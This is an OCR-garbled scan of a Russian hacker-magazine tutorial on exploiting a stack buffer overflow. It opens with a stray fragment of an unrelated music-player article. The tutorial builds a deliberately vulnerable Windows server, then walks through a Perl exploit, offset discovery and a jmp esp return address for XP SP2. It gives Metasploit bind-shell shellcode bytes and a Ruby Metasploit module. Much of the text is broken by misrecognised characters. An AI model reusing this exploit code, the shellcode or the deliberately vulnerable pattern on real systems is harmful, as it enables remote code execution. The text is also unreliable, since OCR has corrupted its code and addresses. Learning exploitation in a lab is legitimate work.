ЛпдегргіпЕпд и помогает составлять плей- 
листы по конкретным жанрам. 

А КАКОЙ ПЛЕЕР ЛУЧШЕ? 

Вопрос равнозначен тому, что спросить, какая 
из систем круче всех: Ыпих, МасОЭ или Винда? 
Сколько людей — столько и мнений. Многие 
пользователи тукса считают, что лучше Атагок, 
который никак не портируют под другие систе- 
мы, придумать что-то сложно. Большинство 
виндовых юзеров используют ѴѴіпатр, причем 
в большинстве своем — по старой привычке, 
а вовсе не потому, что для этого проигрыва- 
теля разработаны сотни профессиональных 
плагинов. Расширяемостью может похвастать 
и бообаг2000, а также ЭопдЬігсІ. Если нужен 
минимализм, то сложно найти что-то круче ІЬуІ 
плеера. Словом, все зависит от предпочтений и 
конкретной ситуации, ц-ц 
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УЧИМСЯ ПИСАТЬ эксплоиты 

ДЛЯ МЕТА5РЮІТ ЕРАМЕШК 



ОТКУДА БЕРУТСЯ СПЛОИТЫ? ЗАДУМЫВАЛСЯ ЛИ ТЫ КАКИМ ОБРАЗОМ ТУСКЛАЯ НОВОСТЬ ИЗ 
БАГТРАКА ПРЕВРАЩАЕТСЯ В РЕАЛЬНО РАБОТАЮЩУЮ ОТМЫЧКУ? КАКИМ ОБРАЗОМ ДВУМЯ 
ДЕСЯТКАМ СТРОЧЕК КОДА УДАЕТСЯ ПОЛУЧИТЬ ШЕЛЛ НА УДАЛЕННОМ СЕРВЕРЕ? СЕГОДНЯ 
МЫ ПОСЕТИМ ФАБРИКУ СПЛОИТОВ И ВО ВСЕХ ПОДРОБНОСТЯХ ПОСМОТРИМ, КАК ИЗГОТАВ- 
ЛИВАЕТСЯ КАЧЕСТВЕННОЕ ИЗДЕЛИЕ. 



Сплоит — что же это за зверь такой дико- 
винный? По сути, это программа, написанная 
с целью использования уязвимости — в ОС, 
обычной программе или веб-приложении. 

Он может представлять из себя что угодно — 
программку на С/С++ (РеІрЫ, Азт], скриптик 
на Регі или РНР, или даже находиться внутри 
картинки, но главное, что он влияет на уяз- 
вимую систему и заставляет ее работать так, 
как она не запрограммирована. Удаленный 
эксплоит работает через сеть и использует 



уязвимость без какого-либо предваритель- 
ного доступа к уязвимой системе. Локальные 
же сплоиты запускаются непосредственно в 
уязвимой системе, требуя предварительного 
доступа к ней и обычно используются для 
повышения привилегий. 

Сплоиты можно разделить по типу исполь- 
зуемой уязвимости: переполнение буфера, 
501-инъекция, межсайтовый скриптинг и т.д. 
Короче говоря, разновидностей бывает много 
и каждая из них отличается как техникой 



исполнения, так и своей целью. Но есть в них 
одно общее — все они содержат код, выпол- 
няющий задуманные хакером действия. Этот 
код называют: байт- код, шелл -код (так как 
очень часто он предоставляет доступ к шеллу 
на удаленной системе], полезной (боевой) 
нагрузкой (рауіоасі). Написание такого кода — 
целое искусство. Если хочешь разобраться в 
этой области, советую начать со статьи Зіер'а 
«Откуда берутся шелл-коды» (РОЕ прилага- 
ется на диске]. Мы же рассмотрим процесс 
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МОДИФИЦИРОВАННЫЙ СПЛОИТ С ПОЛУЧЕННОЙ 
СТРОКОЙ (ОБРАЩАЕМ ВНИМАНИЕ НА ЕІР) 
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СТЕК ДО ВЫ30ВА5КТСРѴ (ВЫДЕЛЕНЫ 
[ЕВР] [КЕТ] [СЛЕДУЮЩИЙ КАДР СТЕКА]) 



414ІШІ «И» 
№ I &2.І 414 Ш41 ЙЙ№ 

4ММИ ССК 

«мина 

г;-- 43434343 СЕСС 






СТЕК ПОСЛЕ ВЫ30ВА5ТРСРѴ (ВЫДЕЛЕНЫ 
[ЕВР][КЕТ][СЛЕДУЮЩИЙ КАДР СТЕКА]) 



рг(Меззаде); // вызываем функцию, кото- 
рая не проверяет длину входного буфера при 
копировании 






сіозезоскер (сІіепРЗоскеР) ; 
сіозезоскер ( зегѵегЗоскеР) ; 
ШЗАСІеапир ( ) ; 
геРигп 0 ; 



} 



> іпіо 

• Подробная инфор- 
мация об МеІазрІоК 
АРІ: ѵѵѵѵѵѵ.ппеіазріоір 
сот/сіоситепіз/арі/ 
тзбіоге/іпсІех.ЫппІ. . 

• Блог МеІазрІоМ: 
Ргатеѵѵогк: 
Ыод.теІазрІоіРсопп . 

• Статья по доработке 
эксплоита: 
еп.ѵѵікіЬоокз.огд/ 
ѵѵікі/МеІіазрІоіІ:/ 
ѴѴгіЦпдѴѴіпбоѵѵзЕхрІоіР 

• Видео, показы- 
вающее, как создать 
РоНаЫе-версию 
МеіазрІоКдля разме- 
щения на флешке: 
ѵѵѵѵѵѵ.ѵѵопбегЬоѵѵІо. 
сот/Ьоѵу-іоА/ісІео/ 
Ьоѵѵ-іо-сгеаіе- 
а-теіазрІоН:- 
теіегргеіег- 
ехесиІаЫе-РІе-26301 7 . 

• Старые (и соответ- 
ственноуязвимые] 
версии программ 
всегда можно найти 
на оШаррз.сот 

и оібѵегзіоп.сот . 



написания эксплоита, а шелл-код возьмем уже готовый из 
пакета МеІазрІоіР 

ПИШЕМ ЖЕРТВУ ДЛЯ ЭКСПЕРИМЕНТОВ 

Убежден, что нет более наглядного способа продемон- 
стрировать создание боевого кода, чем на конкретном 
примере. Поэтому начнем с игры в горе-программистов 
и наваяем небольшое серверное приложение, оставив в 
нем критическую уязвимость, которую и будем эксплуа- 
тировать. Приложение будет принимать подключения на 
определенном порту: как только придет некоторый пакет, 
будет вызываться функция, выполняющая некоторые дей- 
ствия с полученными данными, после чего приложение 
завершается. Скелет приложения приведен ниже, а пол- 
ный исходник ты найдешь на диске: 

ѵоіб рг ( скаг *зРг) 

{ 

скаг ЪиР [500]=""; 

зРгсру (ЬиР , зРг) ; // вот и сама уязви- 

мость, собственной персоной 
} 

іпР таіп(іпР агдс, скаг **агдѵ) 

{ 



ІпР ЪуРезКесѵ = ЗОСКЕТ_ЕККОК; 
ѵЩііІе ( ЪуРезКесѵ == ЗОСКЕТ_ЕККОК ) 

{ 

//Получаем данные, отправленные клиентом 
ЪуРезКесѵ = гесѵ ( сІіепРЗоскеР, 

Меззаде, 5000, 0 }; 

ІР ( ЪуРезКесѵ == 0 I I 

ЪуРезКесѵ == МЗАЕСОШКЕЗЕТ ) 

{ 

ргіпРР( " ХпСоппесРіоп Сіозесі. \п" ) ; 
Ьгеак; 

} 

} 



Внимательно взглянув на код, можно увидеть, что 
функция ѵоіб рг(сбаг *5Іт) не проверяет длину входно- 
го буфера и, если передать ей в качестве параметра 
строку длиной более 500 символов — получится клас- 
сическое переполнение буфера. Совсем кратко о том, 
как это работает (тут придется вспомнить, как работает 
стек): 

РІЛЗН ЕБІ // кладем в стек указатель на 
буфер, который будем копировать (*зРг) 

САРЪ 5егѵег._рг // вызываем функцию рР 

После вызова САІ_І_ стек будет выглядеть следующим 
образом: 



ЪиР — локальная переменная, куда будем 

копировать входящие данные 

еЬр — сохраненный указатель кадра стека 

геР — адрес возврата 

*зРг — указатель на входящий буфер 



Под переменную Ьиб у нас выделено 500 байт. А что будет, 
если скопировать туда строку длиннее? 

[ЪиР] [ЕВР] [геР] [*зРг] 

[ ААА АААААА ААААА ААААА АААААА ААААА ААААА ААА ] 

Как видишь, такая строка затрет ЕВР, адрес возврата и 
все, что расположено ниже по стеку. Т.е. можно перезапи- 
сать адрес возврата нужным нам значением и тогда при 
выходе из функции мы можем вернуться, куда захотим, 
например, на наш шелл-код. 

Тут, правда, стоит сделать поправку — уязвимости может 
и не быть. В смысле, от такой критической ошибки, 
конечно, никуда не деться, и программа в любом слу- 
чае будет падать, однако использовать переполнение в 
сплоите может не получиться. Виной тому — стековые 
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|У ѵіпгіо»з/зЬе11_Ьіпгі_сср - 3 68 ЪусезФ 

# Ьсср ://цѵѵ.гоесазр1оіс . сого і 

# Епсосіег: х86/зЬікаі;а_да_паіФ 

П ЬРОКТ-5555, РН05Т-, ЕХПТШС-зеЬФ 
ту $Ъиі т Ф 

"\ хЪЬ\ х2е\ х4а\ х9а\ х7Ь\ хЗ 1\ хс9\ хсіЬ\ х<18\ хЬ 1\ х5 6\ хй9\ х74\ х2 4 " 
"\ х*4\ х5сі\ х83\ хс5\ х04\ хЗ 1\ х5сі\ хОсі\ х03\ х5сі\ х23\ ха8\ х6*\ х87" 
"\ хсІЗ\ ха5\ х90\ х78\ х23\ хсіб\ х19\ х9сі\ х12\ хс4\ х7е\ хД5\ х06\ хсШ" 
"\ х±5\ хЬЬ\ хаа\ х93\ х58\ х28\ х39\ хс11\ х74\ х5±\ х8а\ х5с\ хаЗ\ хбе" 
"\ хОЪ\ х51\ х6Ь\ хЗс\ хс*\ х*3\ х17\ хЗ*\ х03\ хсМ\ х2 6\ х*0\ х56\ х15" 
"\ х6е\ хесі\ х98\ х47\ х27\ х79\ хОа\ х78\ х4с\ хЗі\ х96\ х79\ х82\ х4Ъ" 
"\ хаб\ х01\ ха7\ х8с\ х52\ хЬ8\ ха6\ хйс\ хса\ хЬ7\ хе1\ хс4\ х61\ х9±" 
”\ х сі 1 \ хі5\ хаб\ хсЗ\ х2е\ хЬ±\ хсЗ\ х30\ хс4\ хЗе\ х05\ х09\ х25\ х71" 
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"\ х1е\ х30\ х7с\ х7±\ ха1\ х95\ х*6\ х7Ь\ х2а\ х18\ хй9\ хОй\ х68\ хЗі" 
"\ х*й\ х56\ х2Ь\ х5е\ ха4\ х32\ х9а\ х52\ хЬ6\ х9Ъ\ х43\ х*а\ хЪс\ хОе" 
х90\ х7с\ х9і\ х46\ х55\ хЬЗ\ х20\ х97\ х*1\ хс4\ х53\ ха5\ х5е\ *1±" 
п \ х1!с\ х85\ х 17\ х59\ х*Ъ\ хеа\ х02\ х 1й\ х93\ х 14\ хас\ х5е\ хЪй\ хй2 " 
"\ х±8\ хОе\ хй5\ х*3\ х80\ хс4\ х25\ х±Ь\ х55\ х4а\ х76\ х53\ х05\ х2Ъ" 
"\ х2 6\ х 13 \ хі5\ хсЗ\ х2с\ х9с\ х2а\ хіЗ\ х4е\ х76\ х5сі\ хЗЗ\ х81\ ха2 ” 
"\ хОе\ хсН\ хеО\ х54\ ха5\ х97\ хбс\ хЬ2\ ха±\ хс7\ х38\ хбс\ х47\ х2а" 
"\ х1і\ ха5\ х*0\ х55\ х75\ х99\ ха9\ хс1\ хс1\ х*7\ х6сі\ хесІ\ хс11\ хсісі" 
"\ хсІе\ х42\ х79\ хЬ6\ х94\ х88\ хЪе\ ха7\ хаЬ\ х84\ х96\ хае\ х94\ х4і” 
хбс\ хс12\ х57\ х*1\ х71\ хса\ хО*\ х92\ хеО\ х91\ хс*\ хсісІЧ х18\ хОе" 
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1,70 КВ (1 747 Ьу*е$), 33 Кпе$. РегІ Іл 1, СоІ 1 [Кириллица (УМгхіоѵѵ$) 

СГЕНЕРИРОВАННЫЙ МЕТА5РЕ0ІТ БОЕВОЙ ШЕЛЛКОД 



куки — специальная защита, включаемая 
в бинарник компилятором во время сборки 
приложения. Существует несколько спосо- 
бов обхода такой защиты (подробнее — во 
врезке], но сейчас для простоты примера 
представим, что стековые кукисы отключены. 
Поэтому либо отключаем поддержку кукисов 
во время компиляции в Ѵізиаі 5іисІ іо, либо 
используем компилятор, который вообще не 
умеет встраивать подобную защиту. Второй 
вариант, как мне кажется, проще — потому 
как можно использовать бесплатный ком- 
пилятор Іссѵѵі п32 [ ѵѵѵѵѵѵ.с5.ѵігдіпіа.еби/~[сс- 
ѵѵі п32 ] . Итак, компилируем и запускаем. 

УБИТЬ НАПОВАЛ! 

Сервер работает ровно до тех пор, пока 
ему не придет строка, состоящая более чем 
из 500 символов. В противном случае — 
непременно вылет приложения. Набросаем 
небольшой скриптик на Регі'е для эксплуата- 
ции переполнения буфера: 

изе зСгісС; 

изе ЗоскеС; 

ту $^ипк = " \х41 " хІООО; 

# адрес и порт узявимого демона 



ту $козР = зМПР | | ' ІосаІЬозк ' ; 
ту $рогД = зМПР | | 2 00; 
ту $ргоко = декргокоЬупате ( ' Сер ' ) ; 

# осуществляем привязки 

ту $іаскІг = іпек_акоп ( $козк ) ; 
ту $рас!с1г = зоскасі<іг_іп ( $рогк , 
$іасі(іг) ; 

ргіпк " [+] Зеккіпд ир зоскек\п" ; 

# создаем сокет и присоединяемся 
к порту 

зоскеР ( ЗОСКЕТ , РР_ШЕТ , 

ЗОСК_ЗТЕЕАМ , $ргоРо) 
ог <ііе " зоскеР: $ ! " ; 
ргіпР " [+] СоппесРіпд Ро $РюзР оп 
рогР $рогР\п" ; 

соппесР (ЗОСКЕТ, $расісіг) ог сііе 
" соппесР: $ ! " ; 

ргіпР " [ + ] Зепйіпд рау1оа<і\п" ; 
ргіпР ЗОСКЕТ $ з ипк . " \п" ; 
ргіпР " [ + ] Рауіоасі зепР\п" ; 

сіозе ЗОСКЕТ ог сііе "сіозе: $1"; 

Скрипт просто соединяется с сервером и 
посылает ему строку символов «А» длиной 




ГЕНЕРИРУЕМ СТРОКУ, ЧТОБЫ 
ОПРЕДЕЛИТЬ, КАКИЕСИМВОЛЫ 
ЗАТЕРАЮТ АДРЕС ВОЗВРАТА 




СТРУКТУРА МЕТА5РЮІТ 
РРАМЕѴѴОВК 

1000 ($] и п к = м \х4Г хІООО]. Чтобы наглядно 
посмотреть, что в момент получения такой 
строки происходит внутри нашего сервера, 
запускаем его под отладчиком — идеально, 
под ОНуйбд ( ѵѵѵѵѵѵ.оЦѵсІЬд.сІе ). Выбираем 
наш бинарник через меню «Рііе -> Ореп» и 
отдаем команду на выполнение: «ОеЬид 
Ревіагі: Рип». Далее запускаем простень- 

кий сплоит, который, как и следовало ожи- 
дать, убивает наш сервер наповал. Смотрим 
в отладчик — адрес возврата из функции рі 
(и, как следствие, регистр ЕІР, указываю- 
щий на следующую инструкцию] оказыва- 
ется перезаписанным значением 41414141 
(как ты помнишь, 0x41 — это символ А]. 

Но на момент, когда мы будем глядеть в 
отладчик, уже произойдет возврат по адресу 
41414141, и мы будем видеть только ЕІР. Для 
успешной эксплуатации уязвимости нужно 
построить ядовитую строку так, чтобы она 
переписывала адрес возврата нужным нам 
значением — адресом нашего шелл-кода. 
Поэтому сначала необходимо выяснить, 
какие именно символы строки затирают 
адрес возврата. В этом поможет одна из 
утилит МеіазрІоИ; Егатеѵѵогк. Но перед этим 
предлагаю тебе быстренько ознакомиться с 
фреймворком. 

ИСПОЛЬЗУЕМ МЕТАЗРЮІТ 
ДЛЯ РАЗРАБОТКИ ЗКСПЛОИТА 

Символов в передаваемой строке 1000, 
все они одинаковые, поэтому неудиви- 
тельно, что в строке возврата появляется 
значение, состоящее из буквы А. Но если 
составить строку, которая будет состоять 
из неповторяющихся буквенно-числовых 
строк, то легко определить позицию тех 
символов, которые попадают в адрес воз- 
врата. Генерацией такой строки как раз 
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ИСПОЛЬЗУЕМ НАПИСАННЫЙ МЕТА5РІ.0ІТ МОДУЛЬ ДЛЯ ЭКСПЛУАТАЦИИ УЯЗВИМОГО СЕРВЕРА 




Информация пред- 
ставлена исключи- 
тельно в ознакоми- 
тельных целях, чтобы 
показать, чего стоят 
критические уязви- 
мости в коде и как 
злоумышленники 
могут их использо- 
вать. Не повторяй эти 
действия в противо- 
законных целях. 

В противном случае 
автор и редакция 
ответственности не 
несут! 




> сЫ 



Все исходники и про- 
граммы, упомянутые 
в статье ты, как 
обычно, найдешь на 
диске. 



и занимается утилита, входящая в состав Меіазріоіі, 
раНегп_дегега1:е. В качестве единственного обяза- 
тельного параметра передается длина строки. Итак, 
создадим буфер длиной в 1000 символов для даль- 
нейшего использования в нашем сплоите: 

шзЕ > гиЬу раккегп_сгеаке . гЪ 1000 
АаОАа1Аа2АаЗ [967 символов вырезано злым 
редактором] ВЬ0ВІі1В]т2В]т 

А в скрипте заменим значение переменной $щпк на выше- 
приведенную последовательность. Заново запускаем наш 
уязвимый сервер, подключаемся к нему в ОИуйЬд и запуска- 
ем эксплоит. Сервер опять падает. Что ж, давай взглянем, 
что на этот раз оказалось в регистре ЕІР? ЕІР = 41387141. 
Чтобы определить смещение символов в строке, используем 
другую утилиту из набора Меіазріоіі — раНегп_оЯзеІ, пере- 
давая в параметрах искомую величину и длину буфера: 

шу $РоСа1Ьи^Еег = 1000; 

# длина буфера 

ту $эипк = "\х41" х 504; 

# первые 504 символа "А" 

ту $еірОѵегшгіке = " \х42" х 4; 

# 4 символа "В" , которые перезапишут адрес 
возврата 

ту $:іипк2 = " \х43" х ( $Сока1Ьиббег- 
ІепдЫі ( $ з ипк . $еіроѵегшгіке} ) ; 

# оставшееся место в буфере заполняем сим- 
волами "С" 

И заменяем строчку кода, отправляющую сформирован- 
ную строку в сокет, на: 

ргіпк ЗОСКЕТ $зипк. $еіроѵегшгіке . $^ипк2 . " \ 
п" ; 



Чтобы проверить, запускаем эксплоит и смотрим в отлад- 
чик. Ага, так и есть: ЕІР = 42424242. Увы, тысячи симво- 
лов слишком мало, чтобы уместить шелл-код, поэтому 
попробуем увеличить длину ядовитой строки и посмо- 
треть, как будет работать сплоит. Длину выбираем экспе- 
риментально: методом проб и ошибок. После увеличения 
длины с 1000 до 2000 (ту фіоІаІЬиНег = 2000] убеждаемся, 
что сплоит по-прежнему работает так же успешно. А это 
значит, мы имеем 2000-4-504=1492 байта для размещения 
нашего шелл-кода. Все это прекрасно, но как передать 
управление шелл-коду — ведь его адреса мы не знаем! 
Давай посмотрим, что у нас происходит со стеком в момент 
переполнения. Поставим в отладчике бряк на функцию 
зітсру. Ьрх зітсру не работает — значит, поставим бряк 
вручную. Как видно из исходников, вызов зітсру проис- 
ходит в функции рі, которая вызывается непосредственно 
после цикла ѵѵЫІеО в таіп. В цикле у нас происходит 
вызов гесѵ: попробуем поставить бряк на него с помощью 
команды Ьрх гесѵ. Ага, сработало! Теперь смотрим чуть 
ниже цикла и видим вызов саіі зегѵеп_рЕ Становимся на 
этой инструкции, нажимаем <ЕпІег> и попадаем в функцию 
рЕ В ней есть всего один саіі — вызов зітсру. Он-то нам и 
нужен: переходим на него и нажимаем <Е2> для установки 
брэйкпоинта. 

0040130В: САЬЬ 00404351 

Далее запускаем эксплоит. Бряк сработал, — смотрим, 
что в стеке (в о Ну стек показывается в правом нижнем 
углу и имеет формат «адрес — значение — коммена- 
рий; типа геіигп Іо кегпе132. 728232»]: 

[Ъик] [еЬр] [гек] [предыдущий стековый фрейм] 

Нажимаем <Б8> (перейти на следующую инструкцию] и 
отмечаем изменения в стеке: 
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[Ъиб] [еЬр] [геб] [пред, стековый фрейм] 
[АААААААА] [ВВВ] [СССССССС...] 

Теперь взглянем на конец функции рТ 

00401313 РОР ЕБІ 

00401314 РОР ЕЗІ 

00401315 ЬЕАѴЕ 

00401316 КЕТЫ 

При вызове команды І_ЕАѴЕ происходит сле- 
дующее: 

МОѴ ЕЗР , ЕВР //теперь в ЕЗР 
содержится адрес [еЬр] 

РОР ЕВР // в ЕВР заносится зна- 
чение из [еЬр] (эта область у 
нас перезаписана символами «А», 
следовательно, ЕВР будет равен 
41414141) , ЕЗР теперь указывает на 
адрес возврата. 

При выполнении команды ПЕТЫ из стека 
выталкивается адрес возврата — поэтому 
получается, что Е5Р указывает на начало 
стекового фрейма, то есть на $]’ипк2, где мы и 
будем размещать наш шелл-код. А как перейти 
по адресу, лежащему в езр? Хороший вопрос! 
Переход к Е5Р — вполне обычное действие 
для виндовых приложений. Более того, любое 
такое приложение использует, как минимум, 
одну системную ОБЕку, в которых есть инструк- 
ции на любой вкус. Адреса в таких Бирках, 
как правило, статичны и не изменяются! 
Получается, если найти инструкцию перехода 



на Е5Р (а это либо ]гпр езр, либо ризб езр + 
геі, либо саіі езр], взять ее адрес и заменить 
им адрес возврата, то на выходе из функции 
управление передастся на Е5Р — прямиком 
нашему шелл-коду. 

Есть один момент, который стоит упомянуть! 
Адрес возврата не должен содержать нуле- 
вых байтов, ведь функция зігсру воспримет 
все как признак конца строки и не скопирует 
оставшуюся часть буфера, то есть $]ипк2, куда 
мы хотели разместить шелл -код. Поэтому мы 
будем искать инструкцию перехода по езр в 
динамических библиотеках, используемых 
приложением, так как адрес такой инструкции 
в библиотеках будет выше, и не будет занимать 
все четыре байта — исключая возможность 
появления нуля в начале. 

Осуществлять поиск будем с помощью полез- 
ной утилиты бпсутр, входящей в состав пакета 
тулз М5Е еХрІоіІ ВиіШег [ ѵѵѵѵѵѵ.зесигіпіюз.іпію/ 
теІазрІоіі/МБЕ ХВ.рбр ] — он нам понадо- 
бится и позже. Прога ищет адрес команды саіі, 
]ппр, ризб + регистр и геі в сИІ или приложе- 
нии. Наша программа работает с сокетами, и 
значит, она будет использовать стандартную 
виндовую библиотеку ѵѵз2_3 2. сІИ. Посмотрим, 
есть ли там интересующий нас опкод (то есть 
машинные инструкции, соответствующие пере- 
даче управления на Е5Р]. Запускаем с указа- 
нием, во-первых, библиотеки для поиска, и, 
во-вторых, нужного регистра: 

Еіпбзшр2 . ехе мз2_32.б11 езр 
Зсаппіпд мз2_32.б11 бог собе 
изеаЫе тбЬ бЪ.е езр гедізбег 
0х71АВ9372 ризЪ. езр — геб 



Еіпізітеб Зсаппіпд мз2_32.б11 бог 
собе изеаЫе тбЬ. бЪе езр гедізбег 
Еоипб 1 изаЫе аббгеззез 

Найден один подходящий нам адрес — 

0x7 1 АВ9372. Кстати, если вдруг нужного опкода 
в другой ситуации не найдется — не беда, 
можно поискать в кегпе132.сИ1, которая исполь- 
зуется всеми приложениями. Аналогичный 
поиск по этой библиотеке дает еще два под- 
ходящих адреса. В действительности, это не 
самый удачный вариант и искать опкоды в 
системных библиотеках стоит в самом послед- 
нем случае. Дело в том, что библиотеки разли- 
чаются от системе к системе и даже от версии 
сервиспака, установленного в винде. Адрес 
0x7 1 АВ9372 действителен только для англий- 
ской ѴѴіпсІоѵѵз ХР 5Р2 — для другой системы 
он будет другой! Именно поэтому подходящие 
опкоды стоит искать в Бибках, которые уста- 
навливает в систему сама программа — только 
в этом случае есть шанс написать незави- 
сящий от версии ѴѴісІпоѵѵз сплоит. В нашем 
случае, увы, такой вариант невозможен в виду 
простоты примера, но свои динамические 
библиотеки для реального виндового прило- 
жения — это в большинстве случаев норма. 
Осталось только создать шелл-код. Как я уже 
говорил, к сплоиту предъявляется одно важ- 
ное требование — он не должен содержать 
нулевых байтов. В программе копируется 
строка, и если встретится «О», он будет вос- 
принят как конец строки. Соответственно, 
оставшаяся часть строки не скопируется, а 
неполный шелл-код, естественно, не будет 
работать. В создании шелл-кода нам опять 
поможет Меіазріоіі; и консольный интерфейс 
для управления фреймворком. Итак, запу- 
скаем консоль Іооіз/тзісопзоіе и вводим 
следующее: 

тзб > изе ѵлі_пботлгз/з]те11_Ъіпб_бср 
// будем использовать этот рауіоаб 
тзб рауіоаб ( з1те11_Ъіпб_бср) > зеб 
ЬРОКТ 5555 // устанавливаем значе- 
ние порта на удаленной машине 
ЬРОЕТ => 5555 

С помощью команды «депегаіе -Ь» посмотрим 
опции, которые можно указать для генерации 
шелл -кода: 

• -Ь <орб> — список символов, которые сле- 
дует исключить из шелл-кода; 

• -б <орб> — имя файла, куда сохраняется 
шелл -код; 

• -б <орб> — тип шелл-кода: гибу, регі, с или 
гаѵѵ. 

Указываем, что надо избегать байтов '\хОО\хіТ, 
генерировать код для Регі'а и сохранить полу- 
ченные результаты в с:\\зЬеІІсосІе.Ьіп: 

тзб рауіоаб ( зйе11_Ыпб_бср) > 
депегабе -Ь '\х00\хбб' -б с:\\ 
збеіісобе .Ып -б регі 
[*] Шгібіпд 1747 Ьубез бо с:\ 
зйеіісобе .Ып. . . 
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КОНСТРУИРУЕМ СМЕРТОНОСНЫЙ ПАКЕТ 



Вот теперь, имея на руках шелл-код, наста- 
ло время собрать полноценный эксплоит. 
Единственное — нужно помнить несколько 
моментов: 

• в шелл-коде не должны встречаться ОхИ и 
0x00 байты, но мы об этом уже позаботились; 

• непосредственно перед шелл-кодом нужно 
поместить цепочки из ІЧОР (машинная коман- 
да — нет операции] — на случай, если мы чуть- 
чуть накосячили с адресом возврата. 
Отправляемая серверу строка будем формиро- 
ваться следующим образом: 

ту $зипк = " \х90" х 504; // первые 
504 ШР'а 

#ЗЩр езр (ігот ъгз2_32 . <3.11 ) 
ту $еіроѵегілггіке = 
раск ( 1 V , 0х71АВ9372 ) ; // переза- 
писываем адрес возврата значением 
0х71АВ9372 
#аскі зоте ЫОР 1 з 

ту $з1^е11сосіе= ,, \х90 " х 50; // добав- 
ляем 50 пор-ов перед шелл-кодом 
// прибавляем сгенерированный нами 
шелл - код ( тпскжз / зке 1 1_Ь іпб_б ср ) 
$зЬе11собе=$зке11собе . "\хЬЬ\х2е\ [и 
тут тоже кушал редактор ] хбЗ " ; 

Окончательная строка, отправляемая в сокет: 

// и отправляем ядовитую строку 
серверу 

ргіпб ЗОСКЕТ $^ипк . $еіроѵегѵ7ГІбе . $з 
кеіісобе . " \п" ; 

После чего пытаемся в сплоите установить 
соединение с удаленной машиной на 5555 
порту, который мы указали при генерации 
шелл -кода: 

зузбет( " Деіпеб $Ьозб 5555"}; 

Запускаем эксплоит и... о чудо, он работает! 
Протестировав эксплоит на различных ОС 



(ѴѴіпбоѵѵз ХР 5РЗ], можно увидеть, что значе- 
ние смещения не меняется — меняется только 
наш адрес возврата. 

ЭКСПЛОИТ ДЛЯ МЕТАЗРЮІТ 

Итак, у нас есть сплоит для конкретной плат- 
формы с вполне определенной нагрузкой, 
открывающей в системе шелл. Так зачем 
нужна вообще какая-либо специальная 
платформа для создания сплоита, если мы 
вполне обошлись силами одного лишь Регі'а? 
Причина в том, что Меіазріоі:! предоставляет 
огромное количество заготовок, реализаций 
различных протоколов, одну из самых больших 
баз шелл-кодов, рауіоасі-ов, которые можно 
использовать при написании собственного 
эксплоита. Вместо убогого скрипта на РегГе 
можно написать модуль для Меіазріоф после 
чего запускать его на любой платформе и 
выбирать рауіоасі на свой вкус! Чуешь разни- 
цу? Предлагаю прямо сейчас усовершенство- 
вать наш сплоит, переписав его для Меіазріоіі:, 
и посмотреть, как это работает. Само собой, он 
будет обладать возможностью выбора плат- 
формы для атаки, а выбирать пейлоадты смо- 
жешь прямо во время ее исполнения. 

Любой эксплоит для Меіазріоіі имеет фикси- 
рованную структуру, которая состоит из объ- 
явления заголовочных файлов, подключения 
ядра тзі/соге, определения класса эксплоита, 
в котором описывается его функциональность. 
Я не буду приводить здесь полный исходник 
модуля, но выкладываю на диске. Рекомендую 
для большей ясности открыть его прямо сей- 
час и далее читать мое практически построч- 
ное объяснение кода. 

Первое, с чего начинается любой сплоит, — 
это подключение ядра Меіазріоіі Ргатеѵѵогк: 

гесдиіге 'тзі/соге' 

Функциональность любого сплоита описыва- 
ется с помощью класса, где настройки зада- 
ются с помощью параметров, а функциональ- 



ность — с помощью методов. Создаваемый 
объект наследуется от одного из предопреде- 
ленных классов. Поскольку мы создаем уда- 
ленный сплоит, то и наследуем наш объект от 
родительского класса «Удаленный эксплоит». 
В синтаксисе Рыбу это делается так: 

сіазз МеіазрІоііЗ < 

Мзі: : Ехріоіі : :Кетоіе. 

Большая заслуга Меіазріоіі в том, что он уни- 
фицирует большое количество параметров 
и действий, позволяя использовать готовые 
конструкции вновь и вновь. Первый элемент 
разрабатываемого класса — секция іпсіисіе, 
где мы подключаем обработчик для нужного 
нам протокола. В Меіазріоіі есть обработчики 
для Ыір, Ир и других протоколов, что позволяет 
быстрее писать эксплоиты, не заморачиваясь 
с их собственной реализацией. Наш эксплоит 
использует ТСР-подключение, поэтому код 
будет выглядеть следующим образом: 

іпсіисіе Мзі: : Ехріоіі: :Кетоіе: :Тср 

Далее весь сплоит делится на два метода: 
метод инициализации, в котором мы указыва- 
ем информацию, необходимую для успешного 
выполнения эксплоита, и метод эксплуатации, 
в котором мы отправляем на сервер ядовитую 
строку. 

Начнем с инициализации. Параметр Рауіоасі 
задает длину ядовитого буфера и недопусти- 
мые символы (в нашем случае — 0x00 и Охіі] : 

' Рауіоасі ' => 

{ 

' Зрасе ' => 1400, 

'ВасЮіагз' => " \х00\хіі" , 

) 

Далее определяем цели эксплоита и специ- 
фичные для каждой цели параметры, такие как 
адрес возврата, смещение и т.д.: 

'Ріаііогт' => 'тп ' , 

'Тагдеіз' => 

[ 

['Міпсісжз ХР ЗР2 Еп', 

{ 'Кеі' => 0х0х71аЬ9372 , 

' Оіізеі ' => 504 } ] , 

[*Міпсіош 2003 Зегѵег В2 8Р2 ' , 

{ 'Кеі' => 0х71с02Ь67, 

' Оіізеі 1 => 504 } ] , 

] 

Обрати внимание, мы не определяем сам 
шелл-код — то есть, нагрузку, которую выпол- 
нит сплоит. Действие на удаленной машине 
будет выбираться интерактивно во время 
работы в консоли Меіазріоіі'ом. Сейчас нам 
остается только написать самое главное 
— метод для эксплуатации уязвимости. С 
помощью команды соппесі устанавливаем 
ТСР-соединение (обработчик протокола 
мы подключили выше и даже указали порт, 



► озб 
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помнишь?), далее — определяем ядовитую 
строку и передаем ее в сокет, после чего раз- 
рываем соединение. Ядовитый буфер состоит 
из цепочки ІЧОР-команд, величины (Жзеі: 

— затем к ней прибавляется адрес возврата, 
еще небольшая ЫОР-цепочка и зашифрован- 
ный РАУ ЮАР. Все вместе выглядит так: 

сіек ехріоік 
соппеск 

дііпк = таке_порз (кагдек [ 'Оккзек ' ] ) 
зріоік = зипк + [кагдек . гек] . 
раск('Ѵ') + таке_порз (50) + 
рауіоасі. епсосіесі 

зоск . рик ( зріоік ) 

капсііег 

сіізсоппеск 

епсі 

Вот и все, наш первый модуль для Меказріоіі 
готов! Чтобы его можно было использовать, 
скопируем исходник в папку тосіиіез/ехріоііз/ 
Іезі (если не нравится Іезі — можешь скопи- 
ровать в ѵѵіпбоѵѵз/тізс, например). Запускаем 
тзісопзоіе и работаем в интерактивной консо- 
ли Меказріоік'а ! 

ЭКСЛОИТ ЗА 5 МИНУТ 

Как видишь, разработать эксплоит для 
Меіазріоі не так сложно. Скорее даже наобо- 
